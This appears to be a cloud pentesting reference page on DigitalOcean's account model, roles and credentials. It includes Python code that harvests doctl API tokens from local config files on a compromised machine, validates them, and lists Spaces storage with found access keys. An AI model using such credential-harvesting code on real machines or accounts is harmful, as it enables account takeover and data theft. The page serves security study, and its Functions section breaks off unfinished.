DO - Basic Information
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Basic Information
DigitalOcean is a cloud computing platform that provides users with a variety of services, including virtual private servers (VPS) and other resources for building, deploying, and managing applications. DigitalOcean's services are designed to be simple and easy to use, making them popular among developers and small businesses.
Some of the key features of DigitalOcean include:
Virtual private servers (VPS): DigitalOcean's VPS are called Droplets. They can be used to host websites and applications, are known for their simplicity, and can be deployed in seconds from a stock OS image, a pre-built 1-Click application image or a custom image.
Storage: DigitalOcean offers a range of storage options, including object storage, block storage, and managed databases, that can be used to store and manage data for websites and applications.
Development and deployment tools: DigitalOcean provides a range of tools to build, deploy and manage applications, including a REST API, the doctl command-line client and pre-built images.
Security: DigitalOcean places a strong emphasis on security, and offers a range of tools and features to help users keep their data and applications safe. This includes encryption, backups, and other security measures.
Overall, DigitalOcean is a cloud computing platform that provides users with the tools and resources they need to build, deploy, and manage applications in the cloud. Its services are designed to be simple and easy to use, making them popular among developers and small businesses.
Main Differences from AWS
One of the main differences between DigitalOcean and AWS is the range of services they offer. DigitalOcean focuses on providing simple and easy-to-use virtual private servers (VPS), storage, and development and deployment tools. AWS, on the other hand, offers a much broader range of services, including VPS, storage, databases, machine learning, analytics, and many other services. This means that AWS is more suitable for complex, enterprise-level applications, while DigitalOcean is more suited to small businesses and developers.
Another key difference between the two platforms is the pricing structure. DigitalOcean's pricing is generally more straightforward and easier to understand than AWS, with a range of pricing plans that are based on the number of droplets and other resources used. AWS, on the other hand, has a more complex pricing structure that is based on a variety of factors, including the type and amount of resources used. This can make it more difficult to predict costs when using AWS.
Hierarchy
User
A user is what you expect: an individual account. A user can create teams and be a member of several different teams.
Team
A team is a group of users. When a user creates a team they get the owner role on that team and initially set up the billing info. Other users can then be invited to the team.
Inside the team there might be several projects. A project is just a set of services running together. It can be used to separate different infra stages, like prod, staging, dev...
Project
As explained, a project is just a container for all the services (droplets, spaces, databases, kubernetes...) running together inside of it. A Digital Ocean project is very similar to a GCP project without IAM.
Permissions
Team
All members of a team have access to the DO resources in every project created within the team (with more or fewer privileges depending on their role). Projects are an organisational boundary only, not a permission boundary.
Roles
Each user in a team has one of the following three roles:
| Role | Shared Resources | Billing Information | Team Settings |
|---|---|---|---|
| Owner | Full access | Full access | Full access |
| Biller | No access | Full access | No access |
| Member | Full access | No access | No access |
Owner and member can list the users and check their roles (biller cannot).
Access
Username + password (MFA)
As on most platforms, you can access the GUI with a valid username and password to reach the cloud resources. Once logged in you can see all the teams you are part of in https://cloud.digitalocean.com/account/profile, and all your activity in https://cloud.digitalocean.com/account/activity.
MFA can be enabled per user, and it can be made mandatory for every member of a team in order to access that team.
API keys
In order to use the API, users generate personal access tokens in https://cloud.digitalocean.com/account/api/tokens. A token always has Read permission; Write permission is optional. Current tokens look like `dop_v1_` followed by 64 hexadecimal characters, and they are sent as a bearer token (`Authorization: Bearer <token>`).
The cli tool is doctl. Initialise it with `doctl auth init` (it prompts for a token).
By default doctl stores this token in clear text in its config file: on macOS in /Users/<username>/Library/Application Support/doctl/config.yaml, on Linux in ~/.config/doctl/config.yaml (or $XDG_CONFIG_HOME/doctl/config.yaml) and on Windows in %APPDATA%\doctl\config.yaml. Anyone who can read that file can act as the user with the API, so it is one of the first things to look for on a compromised developer machine.
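The following is an added example (not HackTricks' or DigitalOcean's code) of what a practitioner does with that config file: locate it on the usual paths, pull out every token (doctl keeps a top-level `access-token` plus named `auth-contexts` created with `doctl auth init --context`; the sample config and its tokens below are constructed and fake), check each one against the `dop_v1_` format, and build the bearer-authenticated request to `/v2/account` that confirms whose token it is. Only `whoami` touches the network; everything else runs offline.

```python
import os
import re
import json
import urllib.request
from pathlib import Path

# Default doctl config locations (macOS, Linux/XDG, Windows). After
# `doctl auth init` the token is written here in clear text.
DOCTL_CONFIG_PATHS = [
    Path.home() / "Library" / "Application Support" / "doctl" / "config.yaml",
    Path(os.environ.get("XDG_CONFIG_HOME", str(Path.home() / ".config"))) / "doctl" / "config.yaml",
]
if os.environ.get("APPDATA"):
    DOCTL_CONFIG_PATHS.append(Path(os.environ["APPDATA"]) / "doctl" / "config.yaml")

# Current personal access tokens are "dop_v1_" followed by 64 lowercase hex chars.
TOKEN_RE = re.compile(r"^dop_v1_[0-9a-f]{64}$")

# Constructed sample (fake tokens) in the layout doctl writes: a top-level
# access-token plus named contexts created with `doctl auth init --context`.
SAMPLE_CONFIG = """\
access-token: dop_v1_0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
auth-contexts:
  staging: dop_v1_fedcba9876543210fedcba9876543210fedcba9876543210fedcba9876543210
  broken: not-a-real-token
context: default
"""


def find_tokens(config_text: str) -> dict:
    """Return {context_name: token} for every well-formed token in a doctl config.

    A minimal line-based parser is used on purpose so this runs without PyYAML:
    the top-level `access-token:` is reported as "default", and every indented
    `name: value` line under `auth-contexts:` is a named context. Values that
    do not match the token format are dropped.
    """
    tokens = {}
    in_contexts = False
    for raw in config_text.splitlines():
        line = raw.rstrip()
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        indented = line[0] in " \t"
        key, sep, value = line.strip().partition(":")
        value = value.strip().strip("'\"")
        if not indented:
            in_contexts = key == "auth-contexts"
            if key == "access-token" and TOKEN_RE.match(value):
                tokens["default"] = value
        elif in_contexts and sep and TOKEN_RE.match(value):
            tokens[key] = value
    return tokens


def load_local_tokens() -> dict:
    """Harvest tokens from every doctl config present on this machine."""
    found = {}
    for path in DOCTL_CONFIG_PATHS:
        if path.is_file():
            for name, token in find_tokens(path.read_text()).items():
                found[f"{path}:{name}"] = token
    return found


def api_request(token: str, path: str = "/v2/account") -> urllib.request.Request:
    """Build a bearer-authenticated request against the public DigitalOcean API."""
    return urllib.request.Request(
        "https://api.digitalocean.com" + path,
        headers={"Authorization": f"Bearer {token}", "Accept": "application/json"},
    )


def whoami(token: str) -> dict:
    """Network call: confirm the token works and see which account owns it."""
    with urllib.request.urlopen(api_request(token), timeout=10) as resp:
        return json.load(resp)


if __name__ == "__main__":
    tokens = load_local_tokens() or find_tokens(SAMPLE_CONFIG)
    for name, token in tokens.items():
        print(f"{name}: {token[:12]}...{token[-4:]}")
        try:
            print("  account:", whoami(token)["account"].get("email"))
        except Exception as exc:  # offline, revoked or otherwise unusable token
            print("  lookup failed:", exc)
```

`/v2/account` only needs Read permission, so it is a safe first call for any token; whether Write is also granted can only be learned by trying a write endpoint or from the token's page in the console.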
Spaces access keys
These are keys that give access to Spaces, DigitalOcean's object storage (the equivalent of S3 in AWS or Cloud Storage in GCP). Spaces is S3-compatible, so the keys are a standard access key ID and secret key pair that works with any S3 client pointed at the regional endpoint (<region>.digitaloceanspaces.com).
Each key is composed of a name, a key ID and a secret.
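Because Spaces speaks the S3 protocol, a found key pair can be used with plain AWS Signature Version 4 signing and no DigitalOcean-specific library. The block below is an added example (not HackTricks' or DigitalOcean's code) that signs a `GET /` against a regional endpoint, which lists every Space the key can see; the key pair is constructed and fake, the region `nyc3` is an assumption, and only `list_spaces` needs network access. The same keys work with `s3cmd` or the `aws` CLI by pointing them at the regional endpoint.

```python
import datetime
import hashlib
import hmac
import urllib.request

# Constructed sample credentials (fake). Spaces keys are an access key ID plus
# a secret, used exactly like AWS S3 credentials.
SAMPLE_SPACES_KEY = {
    "name": "ci-backups",
    "key_id": "DO00EXAMPLEKEYID0001",
    "secret": "ExampleSecretKeyExampleSecretKeyExampleSecr",
}

EMPTY_PAYLOAD_SHA256 = hashlib.sha256(b"").hexdigest()


def spaces_endpoint(region: str) -> str:
    """Regional Spaces endpoint; a Space is addressed as <space>.<region>.digitaloceanspaces.com."""
    return f"{region}.digitaloceanspaces.com"


def _hmac(key: bytes, msg: str) -> bytes:
    return hmac.new(key, msg.encode(), hashlib.sha256).digest()


def sigv4_headers(key_id: str, secret: str, region: str, method: str, path: str,
                  query: str = "", payload: bytes = b"", now=None) -> dict:
    """Headers for a SigV4-signed request to a Spaces endpoint.

    This is the same AWS Signature Version 4 scheme S3 uses: the service name is
    "s3" and the "region" in the credential scope is the Spaces region
    (nyc3, ams3, sgp1, ...). `now` can be fixed to make the output deterministic.
    """
    now = now or datetime.datetime.now(datetime.timezone.utc)
    amz_date = now.strftime("%Y%m%dT%H%M%SZ")
    date_stamp = now.strftime("%Y%m%d")
    host = spaces_endpoint(region)
    payload_hash = hashlib.sha256(payload).hexdigest()

    # Canonical request: lowercase, sorted headers, each terminated by "\n".
    canonical_headers = (f"host:{host}\n"
                         f"x-amz-content-sha256:{payload_hash}\n"
                         f"x-amz-date:{amz_date}\n")
    signed_headers = "host;x-amz-content-sha256;x-amz-date"
    canonical_request = "\n".join(
        [method, path, query, canonical_headers, signed_headers, payload_hash])

    scope = f"{date_stamp}/{region}/s3/aws4_request"
    string_to_sign = "\n".join([
        "AWS4-HMAC-SHA256", amz_date, scope,
        hashlib.sha256(canonical_request.encode()).hexdigest(),
    ])

    # Derive the signing key: date -> region -> service -> "aws4_request".
    k_date = _hmac(("AWS4" + secret).encode(), date_stamp)
    k_region = _hmac(k_date, region)
    k_service = _hmac(k_region, "s3")
    k_signing = _hmac(k_service, "aws4_request")
    signature = hmac.new(k_signing, string_to_sign.encode(), hashlib.sha256).hexdigest()

    return {
        "Host": host,
        "x-amz-date": amz_date,
        "x-amz-content-sha256": payload_hash,
        "Authorization": (f"AWS4-HMAC-SHA256 Credential={key_id}/{scope}, "
                          f"SignedHeaders={signed_headers}, Signature={signature}"),
    }


def list_spaces(key_id: str, secret: str, region: str) -> str:
    """Network call: GET / on the regional endpoint returns the bucket list (XML)."""
    headers = sigv4_headers(key_id, secret, region, "GET", "/")
    req = urllib.request.Request(f"https://{headers['Host']}/", headers=headers)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode()


if __name__ == "__main__":
    k = SAMPLE_SPACES_KEY
    print(sigv4_headers(k["key_id"], k["secret"], "nyc3", "GET", "/")["Authorization"])
    try:
        print(list_spaces(k["key_id"], k["secret"], "nyc3")[:300])
    except Exception as exc:  # fake key, offline, or no access in this region
        print("listing failed:", exc)
```

A key is regional only in the sense that each request is scoped to one endpoint; if a listing in one region comes back empty, try the others before concluding the key is useless.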
OAuth Application
OAuth applications can be granted access over Digital Ocean.
It's possible to create OAuth applications in https://cloud.digitalocean.com/account/api/applications and check all allowed OAuth applications in https://cloud.digitalocean.com/account/api/access.
SSH Keys
It's possible to add SSH keys to a Digital Ocean Team from the console in https://cloud.digitalocean.com/account/security.
This way, when you create a new droplet you can select the key, it is installed on the droplet and you can log in via SSH without a password (note that newly uploaded SSH keys are not pushed to already existing droplets for security reasons).
Functions Authentication Token
Functions can always be triggered through the REST API (this is the method the cli uses under the hood) by sending a request that carries an authentication token like:
Logs
User logs
The logs of a user can be found in https://cloud.digitalocean.com/account/activity
Team logs
The logs of a team can be found in https://cloud.digitalocean.com/account/security